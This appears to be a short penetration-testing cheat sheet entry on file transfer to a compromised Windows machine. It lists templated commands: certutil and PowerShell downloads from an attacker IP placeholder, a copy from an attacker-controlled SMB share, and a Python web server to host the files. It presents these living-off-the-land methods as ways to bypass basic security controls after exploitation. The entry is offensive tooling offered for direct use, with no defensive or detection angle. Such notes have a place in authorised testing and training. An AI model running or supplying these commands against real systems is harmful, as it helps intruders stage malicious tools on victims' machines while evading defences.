🛠️ Command
Certutil Download
Download a file from a remote HTTP server using the built-in certutil utility.
certutil.exe -urlcache -split -f http://{{attacker_ip}}/{{file}} {{output_path}}PowerShell Web Download
Use PowerShell’s Invoke-WebRequest to fetch a file from the attacker.
powershell -c "Invoke-WebRequest -Uri http://{{attacker_ip}}/{{file}} -OutFile {{output_path}}"SMB Share Copy
Copy a file directly from an attacker-controlled SMB share.
copy \\{{attacker_ip}}\{{share}}\{{file}} {{output_path}}Python HTTP Server (Attacker side)
Start a quick web server to host files for the target to download.
python3 -m http.server {{port}}📝 Description
Common methods for moving tools and exploits onto a compromised Windows target.
Living off the Land (LotL) binaries like certutil and powershell are preferred as they are natively available and often bypass basic security controls. These techniques are essential for the initial post-exploitation phase where additional enumeration scripts or exploitation binaries are required.